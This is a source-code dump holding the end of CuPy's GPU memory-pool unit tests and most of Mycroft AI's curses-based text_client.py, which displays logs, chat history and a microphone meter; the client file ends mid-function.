del p
# merge tail into head
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del head
del tail
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
del p
def test_free_different_size(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 8)
assert ptr1 != p2.ptr
def test_free_all_blocks(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
self.pool.free_all_blocks()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
del p2
def test_free_all_blocks_split(self):
# do not free splitted blocks
p = self.pool.malloc(self.unit * 4)
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
tailptr = tail.ptr
del tail
self.pool.free_all_blocks()
p = self.pool.malloc(self.unit * 2)
assert tailptr == p.ptr
del head
def test_free_all_blocks_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks(stream=stream_module.Stream.null)
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 == p4.ptr
def test_free_all_blocks_all_streams(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks()
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 != p4.ptr
def test_free_all_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_used_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.used_bytes()
del p2
assert self.unit * 2 == self.pool.used_bytes()
del p1
assert self.unit * 0 == self.pool.used_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 1 == self.pool.used_bytes()
del p3
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
del p2
def test_free_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 0 == self.pool.free_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 0 == self.pool.free_bytes()
del p2
assert self.unit * 4 == self.pool.free_bytes()
del p1
assert self.unit * 6 == self.pool.free_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 5 == self.pool.free_bytes()
del p3
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 4 == self.pool.free_bytes()
del p2
def test_total_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.total_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.total_bytes()
del p1
assert self.unit * 6 == self.pool.total_bytes()
del p2
assert self.unit * 6 == self.pool.total_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 6 == self.pool.total_bytes()
assert (self.pool.used_bytes() + self.pool.free_bytes()
== self.pool.total_bytes())
del p3
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
def test_total_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 6 == self.pool.total_bytes()
del p2
def test_get_limit(self):
# limit is disabled by default
assert 0 == self.pool.get_limit()
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
assert 1024 == self.pool.get_limit()
self.pool.set_limit(size=2**33)
assert 2**33 == self.pool.get_limit()
self.pool.set_limit(size=0)
assert 0 == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
assert 0 == self.pool.get_limit()
self.pool.set_limit(fraction=0.5)
assert total * 0.5 == self.pool.get_limit()
self.pool.set_limit(fraction=1.0)
assert total == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
def test_parse_limit_string(self):
parse_limit_string = self.pool._parse_limit_string
# size
param = parse_limit_string('0')
assert 0 == param['size']
assert None is param['fraction']
param = parse_limit_string('1073741824')
assert 1073741824 == param['size']
assert None is param['fraction']
# fraction
param = parse_limit_string('0%')
assert None is param['size']
assert 0.0 == param['fraction']
param = parse_limit_string('40%')
assert None is param['size']
assert 0.4 == param['fraction']
param = parse_limit_string('70.5%')
assert None is param['size']
assert 0.705 == param['fraction']
param = parse_limit_string('100%')
assert None is param['size']
assert 1.0 == param['fraction']
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
}))
@testing.gpu
class TestMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.MemoryPool(self.allocator)
if (cupy.cuda.runtime.is_hip
and self.allocator is memory.malloc_managed):
raise unittest.SkipTest('HIP does not support managed memory')
def test_zero_size_alloc(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(0).mem
assert isinstance(mem, memory.Memory)
assert not isinstance(mem, memory.PooledMemory)
def test_double_free(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
mem.free()
mem.free()
def test_free_all_blocks(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_blocks_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc.
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_free(self):
with cupy.cuda.Device(0):
mem = self.pool.malloc(1).mem
assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_free_all_free_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc.
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
assert self.pool.n_free_blocks() == 0
def test_n_free_blocks_without_malloc(self):
with cupy.cuda.Device(0):
# call directly without malloc/free_all_free.
assert self.pool.n_free_blocks() == 0
def test_used_bytes(self):
with cupy.cuda.Device(0):
assert 0 == self.pool.used_bytes()
def test_free_bytes(self):
with cupy.cuda.Device(0):
assert 0 == self.pool.free_bytes()
def test_total_bytes(self):
with cupy.cuda.Device(0):
assert 0 == self.pool.total_bytes()
@testing.gpu
class TestAllocator(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
self.pool = memory.MemoryPool()
memory.set_allocator(self.pool.malloc)
def tearDown(self):
self.pool.free_all_blocks()
memory.set_allocator(self.old_pool.malloc)
def test_set_allocator(self):
with cupy.cuda.Device(0):
assert 0 == self.pool.used_bytes()
arr = cupy.arange(128, dtype=cupy.int64)
assert 1024 == arr.data.mem.size
assert 1024 == self.pool.used_bytes()
def test_get_allocator(self):
assert memory.get_allocator() == self.pool.malloc
def test_allocator_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
def test_set_allocator_cm(self):
new_pool = memory.MemoryPool()
new_pool2 = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
with self.assertRaises(ValueError):
memory.set_allocator(new_pool2.malloc)
def test_allocator_nested_context_manager(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
new_pool2 = memory.MemoryPool()
assert memory.get_allocator() == new_pool.malloc
with cupy.cuda.using_allocator(new_pool2.malloc):
assert memory.get_allocator() == new_pool2.malloc
assert memory.get_allocator() == new_pool.malloc
assert memory.get_allocator() == self.pool.malloc
def test_allocator_thread_local(self):
def thread_body(self):
new_pool = memory.MemoryPool()
with cupy.cuda.using_allocator(new_pool.malloc):
assert memory.get_allocator() == new_pool.malloc
threading.Barrier(2)
arr = cupy.zeros(128, dtype=cupy.int64)
threading.Barrier(2)
assert arr.data.mem.size == new_pool.used_bytes()
threading.Barrier(2)
assert memory.get_allocator() == self.pool.malloc
with cupy.cuda.Device(0):
t = threading.Thread(target=thread_body, args=(self,))
t.daemon = True
t.start()
threading.Barrier(2)
assert memory.get_allocator() == self.pool.malloc
arr = cupy.ones(256, dtype=cupy.int64)
threading.Barrier(2)
assert arr.data.mem.size == self.pool.used_bytes()
threading.Barrier(2)
t.join()
def test_thread_local_valid(self):
new_pool = memory.MemoryPool()
arr = None
with cupy.cuda.using_allocator(new_pool.malloc):
arr = cupy.zeros(128, dtype=cupy.int64)
arr += 1
# Check that arr and the pool have not ben released
assert arr.data.mem.size == new_pool.used_bytes()
assert arr.sum() == 128
def test_reuse_between_thread(self):
def job(self):
cupy.arange(16)
self._error = False
# Run in main thread.
self._error = True
job(self)
assert not self._error
# Run in sub thread.
self._error = True
with cupy.cuda.Device(0):
t = threading.Thread(target=job, args=(self,))
t.daemon = True
t.start()
t.join()
assert not self._error
@testing.gpu
class TestAllocatorDisabled(unittest.TestCase):
def setUp(self):
self.pool = cupy.get_default_memory_pool()
def tearDown(self):
memory.set_allocator(self.pool.malloc)
def _check_pool_not_used(self):
used_bytes = self.pool.used_bytes()
with cupy.cuda.Device(0):
arr = cupy.arange(128, dtype=cupy.int64)
assert 0 == self.pool.used_bytes() - used_bytes
del arr
def test(self):
memory.set_allocator()
self._check_pool_not_used()
def test_none(self):
memory.set_allocator(None)
self._check_pool_not_used()
class PythonAllocator(object):
def __init__(self):
self.malloc_called = False
self.free_called = False
def malloc(self, size, device_id):
self.malloc_called = True
return cupy.cuda.runtime.malloc(size)
def free(self, size, device_id):
self.free_called = True
cupy.cuda.runtime.free(size)
@testing.gpu
class TestPythonFunctionAllocator(unittest.TestCase):
def setUp(self):
self.old_pool = cupy.get_default_memory_pool()
self.alloc = PythonAllocator()
python_alloc = memory.PythonFunctionAllocator(
self.alloc.malloc, self.alloc.free)
memory.set_allocator(python_alloc.malloc)
def tearDown(self):
memory.set_allocator(self.old_pool.malloc)
def test_allocator(self):
assert not self.alloc.malloc_called and not self.alloc.free_called
cupy.zeros(10)
assert self.alloc.malloc_called and self.alloc.free_called
@testing.gpu
class TestMemInfo(unittest.TestCase):
def test_mem_info(self):
d = cupy.cuda.Device()
mem_info = d.mem_info
assert isinstance(mem_info, tuple)
assert len(mem_info) == 2
assert all(isinstance(m, int) for m in mem_info)
assert all(m > 0 for m in mem_info)
@testing.gpu
class TestLockAndNoGc(unittest.TestCase):
def test(self):
lock = fastrlock.rlock.FastRLock()
ctx = memory.LockAndNoGc(lock)
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
with ctx:
assert not gc.isenabled()
lock.release()
lock.acquire()
assert gc.isenabled()
self.assertRaises(Exception, lock.release)
class TestExceptionPicklable(unittest.TestCase):
def test(self):
e1 = memory.OutOfMemoryError(124, 1024, 1024)
e2 = pickle.loads(pickle.dumps(e1))
assert e1.args == e2.args
assert str(e1) == str(e2)
|
text_client.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import io
import signal
from math import ceil
from .gui_server import start_qml_gui
from mycroft.tts import TTS
import os
import os.path
import time
import curses
import textwrap
import json
import mycroft.version
from threading import Thread, Lock
from mycroft.messagebus.client.ws import WebsocketClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
from mycroft.configuration import Configuration
import locale
# Curses uses LC_ALL to determine how to display chars set it to system
# default
locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default
preferred_encoding = locale.getpreferredencoding()
bSimple = False
bus = None # Mycroft messagebus connection
config = {} # Will be populated by the Mycroft configuration
event_thread = None
history = []
chat = [] # chat history, oldest at the lowest index
line = ""
scr = None
log_line_offset = 0 # num lines back in logs to show
log_line_lr_scroll = 0 # amount to scroll left/right for long lines
longest_visible_line = 0 # for HOME key
auto_scroll = True
# for debugging odd terminals
last_key = ""
show_last_key = False
show_gui = None # None = not initialized, else True/False
gui_text = []
log_lock = Lock()
max_log_lines = 5000
mergedLog = []
filteredLog = []
default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon", "DEBUG"]
log_filters = list(default_log_filters)
log_files = []
find_str = None
cy_chat_area = 7 # default chat history height (in lines)
size_log_area = 0 # max number of visible log lines, calculated during draw
# Values used to display the audio meter
show_meter = True
meter_peak = 20
meter_cur = -1
meter_thresh = -1
SCR_MAIN = 0
SCR_HELP = 1
SCR_SKILLS = 2
screen_mode = SCR_MAIN
subscreen = 0 # for help pages, etc.
FULL_REDRAW_FREQUENCY = 10 # seconds between full redraws
last_full_redraw = time.time()-(FULL_REDRAW_FREQUENCY-1) # seed for 1s redraw
screen_lock = Lock()
is_screen_dirty = True
# Curses color codes (reassigned at runtime)
CLR_HEADING = 0
CLR_FIND = 0
CLR_CHAT_RESP = 0
CLR_CHAT_QUERY = 0
CLR_CMDLINE = 0
CLR_INPUT = 0
CLR_LOG1 = 0
CLR_LOG2 = 0
CLR_LOG_DEBUG = 0
CLR_LOG_ERROR = 0
CLR_LOG_CMDMESSAGE = 0
CLR_METER_CUR = 0
CLR_METER = 0
# Allow Ctrl+C catching...
ctrl_c_was_pressed = False
def ctrl_c_handler(signum, frame):
global ctrl_c_was_pressed
ctrl_c_was_pressed = True
def ctrl_c_pressed():
global ctrl_c_was_pressed
if ctrl_c_was_pressed:
ctrl_c_was_pressed = False
return True
else:
return False
signal.signal(signal.SIGINT, ctrl_c_handler)
##############################################################################
# Helper functions
def clamp(n, smallest, largest):
""" Force n to be between smallest and largest, inclusive """
return max(smallest, min(n, largest))
def handleNonAscii(text):
"""
If default locale supports UTF-8 reencode the string otherwise
remove the offending characters.
"""
if preferred_encoding == 'ASCII':
return ''.join([i if ord(i) < 128 else ' ' for i in text])
else:
return text.encode(preferred_encoding)
##############################################################################
# Settings
config_file = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
def load_mycroft_config(bus):
""" Load the mycroft config and connect it to updates over the messagebus.
"""
Configuration.init(bus)
return Configuration.get()
def connect_to_mycroft():
""" Connect to the mycroft messagebus and load and register config
on the bus.
Sets the bus and config global variables
"""
global bus
global config
bus = connect_to_messagebus()
config = load_mycroft_config(bus)
def load_settings():
global log_filters
global cy_chat_area
global show_last_key
global max_log_lines
global show_meter
try:
with io.open(config_file, 'r') as f:
config = json.load(f)
if "filters" in config:
log_filters = config["filters"]
if "cy_chat_area" in config:
cy_chat_area = config["cy_chat_area"]
if "show_last_key" in config:
show_last_key = config["show_last_key"]
if "max_log_lines" in config:
max_log_lines = config["max_log_lines"]
if "show_meter" in config:
show_meter = config["show_meter"]
except Exception as e:
LOG.info("Ignoring failed load of settings file")
def save_settings():
config = {}
config["filters"] = log_filters
config["cy_chat_area"] = cy_chat_area
config["show_last_key"] = show_last_key
config["max_log_lines"] = max_log_lines
config["show_meter"] = show_meter
with io.open(config_file, 'w') as f:
f.write(str(json.dumps(config, ensure_ascii=False)))
##############################################################################
# Log file monitoring
class LogMonitorThread(Thread):
def __init__(self, filename, logid):
global log_files
Thread.__init__(self)
self.filename = filename
self.st_results = os.stat(filename)
self.logid = str(logid)
log_files.append(filename)
def run(self):
while True:
try:
st_results = os.stat(self.filename)
# Check if file has been modified since last read
if not st_results.st_mtime == self.st_results.st_mtime:
self.read_file_from(self.st_results.st_size)
self.st_results = st_results
set_screen_dirty()
except OSError:
# ignore any file IO exceptions, just try again
pass
time.sleep(0.1)
def read_file_from(self, bytefrom):
global meter_cur
global meter_thresh
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with io.open(self.filename) as fh:
fh.seek(bytefrom)
while True:
line = fh.readline()
if line == "":
break
# Allow user to filter log output
ignore = False
if find_str:
if find_str not in line:
ignore = True
else:
for filtered_text in log_filters:
if filtered_text in line:
ignore = True
break
with log_lock:
if ignore:
mergedLog.append(self.logid + line.rstrip())
else:
if bSimple:
print(line.rstrip())
else:
filteredLog.append(self.logid + line.rstrip())
mergedLog.append(self.logid + line.rstrip())
if not auto_scroll:
log_line_offset += 1
# Limit log to max_log_lines
if len(mergedLog) >= max_log_lines:
with log_lock:
cToDel = len(mergedLog) - max_log_lines
if len(filteredLog) == len(mergedLog):
del filteredLog[:cToDel]
del mergedLog[:cToDel]
# release log_lock before calling to prevent deadlock
if len(filteredLog) != len(mergedLog):
rebuild_filtered_log()
def start_log_monitor(filename):
if os.path.isfile(filename):
thread = LogMonitorThread(filename, len(log_files))
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
class MicMonitorThread(Thread):
def __init__(self, filename):
Thread.__init__(self)
self.filename = filename
self.st_results = None
def run(self):
while True:
try:
st_results = os.stat(self.filename)
if (not self.st_results or
not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
self.read_mic_level()
self.st_results = st_results
set_screen_dirty()
except Exception:
# Ignore whatever failure happened and just try again later
pass
time.sleep(0.2)
def read_mic_level(self):
global meter_cur
global meter_thresh
with io.open(self.filename, 'r') as fh:
line = fh.readline()
# Just adjust meter settings
# Ex:Energy: cur=4 thresh=1.5
parts = line.split("=")
meter_thresh = float(parts[-1])
meter_cur = float(parts[-2].split(" ")[0])
class ScreenDrawThread(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
global scr
global screen_lock
global is_screen_dirty
global log_lock
while scr:
try:
if is_screen_dirty:
# Use a lock to prevent screen corruption when drawing
# from multiple threads
with screen_lock:
is_screen_dirty = False
if screen_mode == SCR_MAIN:
with log_lock:
do_draw_main(scr)
elif screen_mode == SCR_HELP:
do_draw_help(scr)
finally:
time.sleep(0.01)
def start_mic_monitor(filename):
if os.path.isfile(filename):
thread = MicMonitorThread(filename)
thread.setDaemon(True) # this thread won't prevent prog from exiting
thread.start()
def add_log_message(message):
""" Show a message for the user (mixed in the logs) """
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
message = "@" + message # the first byte is a code
filteredLog.append(message)
mergedLog.append(message)
if log_line_offset != 0:
log_line_offset = 0 # scroll so the user can see the message
set_screen_dirty()
def clear_log():
global filteredLog
global mergedLog
global log_line_offset
global log_lock
with log_lock:
mergedLog = []
filteredLog = []
log_line_offset = 0
def rebuild_filtered_log():
global filteredLog
global mergedLog
global log_lock
with log_lock:
filteredLog = []
for line in mergedLog:
# Apply filters
ignore = False
if find_str and find_str != "":
# Searching log
if find_str not in line:
ignore = True
else:
# Apply filters
for filtered_text in log_filters:
if filtered_text and filtered_text in line:
ignore = True
break
if not ignore:
filteredLog.append(line)
##############################################################################
# Capturing output from Mycroft
def handle_speak(event):
global chat
utterance = event.data.get('utterance')
utterance = TTS.remove_ssml(utterance)
if bSimple:
print(">> " + utterance)
else:
chat.append(">> " + utterance)
set_screen_dirty()
def handle_utterance(event):
global chat
global history
utterance = event.data.get('utterances')[0]
history.append(utterance)
chat.append(utterance)
set_screen_dirty()
def connect(bus):
""" Run the mycroft messagebus referenced by bus.
Arguments:
bus: Mycroft messagebus instance
"""
bus.run_forever()
##############################################################################
# Capturing the messagebus
def handle_message(msg):
# TODO: Think this thru a little bit -- remove this logging within core?
# add_log_message(msg)
pass
##############################################################################
# "Graphic primitives"
def draw(x, y, msg, pad=None, pad_chr=None, clr=None):
"""Draw a text to the screen
Args:
x (int): X coordinate (col), 0-based from upper-left
y (int): Y coordinate (row), 0-based from upper-left
msg (str): string to render to screen
pad (bool or int, optional): if int, pads/clips to given length, if
True use right edge of the screen.
pad_chr (char, optional): pad character, default is space
clr (int, optional): curses color, Defaults to CLR_LOG1.
"""
if y < 0 or y > curses.LINES or x < 0 or x > curses.COLS:
return
if x + len(msg) > curses.COLS:
s = msg[:curses.COLS-x]
else:
s = msg
if pad:
ch = pad_chr or " "
if pad is True:
pad = curses.COLS # pad to edge of screen
s += ch * (pad-x-len(msg))
else:
# pad to given length (or screen width)
if x+pad > curses.COLS:
pad = curses.COLS-x
s += ch * (pad-len(msg))
if not clr:
clr = CLR_LOG1
scr.addstr(y, x, s, clr)
##############################################################################
# Screen handling
def init_screen():
global CLR_HEADING
global CLR_FIND
global CLR_CHAT_RESP
global CLR_CHAT_QUERY
global CLR_CMDLINE
global CLR_INPUT
global CLR_LOG1
global CLR_LOG2
global CLR_LOG_DEBUG
global CLR_LOG_ERROR
global CLR_LOG_CMDMESSAGE
global CLR_METER_CUR
global CLR_METER
if curses.has_colors():
curses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)
bg = curses.COLOR_BLACK
for i in range(1, curses.COLORS):
curses.init_pair(i + 1, i, bg)
# Colors (on black backgound):
# 1 = white 5 = dk blue
# 2 = dk red 6 = dk purple
# 3 = dk green 7 = dk cyan
# 4 = dk yellow 8 = lt gray
CLR_HEADING = curses.color_pair(1)
CLR_CHAT_RESP = curses.color_pair(4)
CLR_CHAT_QUERY = curses.color_pair(7)
CLR_FIND = curses.color_pair(4)
CLR_CMDLINE = curses.color_pair(7)
CLR_INPUT = curses.color_pair(7)
CLR_LOG1 = curses.color_pair(3)
CLR_LOG2 = curses.color_pair(6)
CLR_LOG_DEBUG = curses.color_pair(4)
CLR_LOG_ERROR = curses.color_pair(2)
CLR_LOG_CMDMESSAGE = curses.color_pair(2)
CLR_METER_CUR = curses.color_pair(2)
CLR_METER = curses.color_pair(4)
def scroll_log(up, num_lines=None):
global log_line_offset
# default to a half-page
if not num_lines:
num_lines = size_log_area // 2
with log_lock:
if up:
log_line_offset -= num_lines
else:
log_line_offset += num_lines
if log_line_offset > len(filteredLog):
log_line_offset = len(filteredLog) - 10
if log_line_offset < 0:
log_line_offset = 0
set_screen_dirty()
def _do_meter(height):
if not show_meter or meter_cur == -1:
return
# The meter will look something like this:
#
# 8.4 *
# *
# -*- 2.4
# *
# *
# *
# Where the left side is the current level and the right side is
# the threshold level for 'silence'.
global scr
global meter_peak
if meter_cur > meter_peak:
meter_peak = meter_cur + 1
scale = meter_peak
if meter_peak > meter_thresh * 3:
scale = meter_thresh * 3
h_cur = clamp(int((float(meter_cur) / scale) * height), 0, height - 1)
h_thresh = clamp(
int((float(meter_thresh) / scale) * height), 0, height - 1)
clr = curses.color_pair(4) # dark yellow
str_level = "{0:3} ".format(int(meter_cur)) # e.g. ' 4'
str_thresh = "{0:4.2f}".format(meter_thresh) # e.g. '3.24'
meter_width = len(str_level) + len(str_thresh) + 4
for i in range(0, height):
meter = ""
if i == h_cur:
# current energy level
meter = str_level
else:
meter = " " * len(str_level)
if i == h_thresh:
# add threshold indicator
meter += "--- "
else:
meter += " "
if i == h_thresh:
# 'silence' threshold energy level
meter += str_thresh
# draw the line
meter += " " * (meter_width - len(meter))
scr.addstr(curses.LINES - 1 - i, curses.COLS -
len(meter) - 1, meter, clr)
# draw an asterisk if the audio energy is at this level
if i <= h_cur:
if meter_cur > meter_thresh:
clr_bar = curses.color_pair(3) # dark green for loud
else:
clr_bar = curses.color_pair(5) # dark blue for 'silent'
scr.addstr(curses.LINES - 1 - i, curses.COLS - len(str_thresh) - 4,
"*", clr_bar)
def _do_gui(gui_width):
clr = curses.color_pair(2) # dark red
x = curses.COLS - gui_width
y = 3
draw(x, y, " "+make_titlebar("= GUI", gui_width-1)+" ", clr=CLR_HEADING)
cnt = len(gui_text)+1
if cnt > curses.LINES-15:
cnt = curses.LINES-15
for i in range(0, cnt):
draw(x, y+1+i, " !", clr=CLR_HEADING)
if i < len(gui_text):
draw(x+2, y+1+i, gui_text[i], pad=gui_width-3)
else:
draw(x+2, y+1+i, "*"*(gui_width-3))
draw(x+(gui_width-1), y+1+i, "!", clr=CLR_HEADING)
draw(x, y+cnt, " "+"-"*(gui_width-2)+" ", clr=CLR_HEADING)
def set_screen_dirty():
global is_screen_dirty
global screen_lock
with screen_lock:
is_screen_dirty = True
def do_draw_main(scr):
global log_line_offset
global longest_visible_line
global last_full_redraw
global auto_scroll
global size_log_area
if time.time() - last_full_redraw > FULL_REDRAW_FREQUENCY:
# Do a full-screen redraw periodically to clear and
# noise from non-curses text that get output to the
# screen (e.g. modules that do a 'print')
scr.clear()
last_full_redraw = time.time()
else:
scr.erase()
# Display log output at the top
cLogs = len(filteredLog) + 1 # +1 for the '--end--'
size_log_area = curses.LINES - (cy_chat_area + 5)
start = clamp(cLogs - size_log_area, 0, cLogs - 1) - log_line_offset
end = cLogs - log_line_offset
if start < 0:
end -= start
start = 0
if end > cLogs:
end = cLogs
auto_scroll = (end == cLogs)
# adjust the line offset (prevents paging up too far)
log_line_offset = cLogs - end
# Top header and line counts
if find_str:
scr.addstr(0, 0, "Search Results: ", CLR_HEADING)
scr.addstr(0, 16, find_str, CLR_FIND)
scr.addstr(0, 16 + len(find_str), " ctrl+X to end" +
" " * (curses.COLS - 31 - 12 - len(find_str)) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
else:
scr.addstr(0, 0, "Log Output:" + " " * (curses.COLS - 31) +
str(start) + "-" + str(end) + " of " + str(cLogs),
CLR_HEADING)
ver = " mycroft-core " + mycroft.version.CORE_VERSION_STR + " ==="
scr.addstr(1, 0, "=" * (curses.COLS-1-len(ver)), CLR_HEADING)
scr.addstr(1, curses.COLS-1-len(ver), ver, CLR_HEADING)
y = 2
len_line = 0
for i in range(start, end):
if i >= cLogs - 1:
log = ' ^--- NEWEST ---^ '
else:
log = filteredLog[i]
logid = log[0]
if len(log) > 25 and log[5] == '-' and log[8] == '-':
log = log[27:] # skip logid & date/time at the front of log line
else:
log = log[1:] # just skip the logid
# Categorize log line
if " - DEBUG - " in log:
log = log.replace("Skills ", "")
clr = CLR_LOG_DEBUG
elif " - ERROR - " in log:
clr = CLR_LOG_ERROR
else:
if logid == "1":
clr = CLR_LOG1
elif logid == "@":
clr = CLR_LOG_CMDMESSAGE
else:
clr = CLR_LOG2
# limit output line to screen width
len_line = len(log)
if len(log) > curses.COLS:
start = len_line - (curses.COLS - 4) - log_line_lr_scroll
if start < 0:
start = 0
end = start + (curses.COLS - 4)
if start == 0:
log = log[start:end] + "~~~~" # start....
elif end >= len_line - 1:
log = "~~~~" + log[start:end] # ....end
else:
log = "~~" + log[start:end] + "~~" # ..middle..
if len_line > longest_visible_line:
longest_visible_line = len_line
scr.addstr(y, 0, handleNonAscii(log), clr)
y += 1
# Log legend in the lower-right
y_log_legend = curses.LINES - (3 + cy_chat_area)
scr.addstr(y_log_legend, curses.COLS // 2 + 2,
make_titlebar("Log Output Legend", curses.COLS // 2 - 2),
CLR_HEADING)
scr.addstr(y_log_legend + 1, curses.COLS // 2 + 2,
"DEBUG output",
CLR_LOG_DEBUG)
if len(log_files) > 0:
scr.addstr(y_log_legend + 2, curses.COLS // 2 + 2,
os.path.basename(log_files[0]) + ", other",
CLR_LOG1)
if len(log_files) > 1:
scr.addstr(y_log_legend + 3, curses.COLS // 2 + 2,
os.path.basename(log_files[1]), CLR_LOG2)
# Meter
y_meter = y_log_legend
if show_meter:
scr.addstr(y_meter, curses.COLS - 14, " Mic Level ",
CLR_HEADING)
# History log in the middle
y_chat_history = curses.LINES - (3 + cy_chat_area)
chat_width = curses.COLS // 2 - 2
chat_out = []
scr.addstr(y_chat_history, 0, make_titlebar("History", chat_width),
CLR_HEADING)
# Build a nicely wrapped version of the chat log
idx_chat = len(chat) - 1
while len(chat_out) < cy_chat_area and idx_chat >= 0:
if chat[idx_chat][0] == '>':
wrapper = textwrap.TextWrapper(initial_indent="",
subsequent_indent=" ",
width=chat_width)
else:
wrapper = textwrap.TextWrapper(width=chat_width)
chatlines = wrapper.wrap(chat[idx_chat])
for txt in reversed(chatlines):
if len(chat_out) >= cy_chat_area:
break
chat_out.insert(0, txt)
idx_chat -= 1
# Output the chat
y = curses.LINES - (2 + cy_chat_area)
for txt in chat_out:
if txt.startswith(">> ") or txt.startswith(" "):
clr = CLR_CHAT_RESP
else:
clr = CLR_CHAT_QUERY
scr.addstr(y, 1, handleNonAscii(txt), clr)
y += 1
if show_gui and curses.COLS > 20 and curses.LINES > 20:
_do_gui(curses.COLS-20)
# Command line at the bottom
ln = line
if len(line) > 0 and line[0] == ":":
scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):",
CLR_CMDLINE)
scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE)
ln = line[1:]
else:
prompt = "Input (':' for command, Ctrl+C to quit)"
if show_last_key:
prompt += " === keycode: "+last_key
scr.addstr(curses.LINES - 2, 0,
make_titlebar(prompt,
curses.COLS - 1),
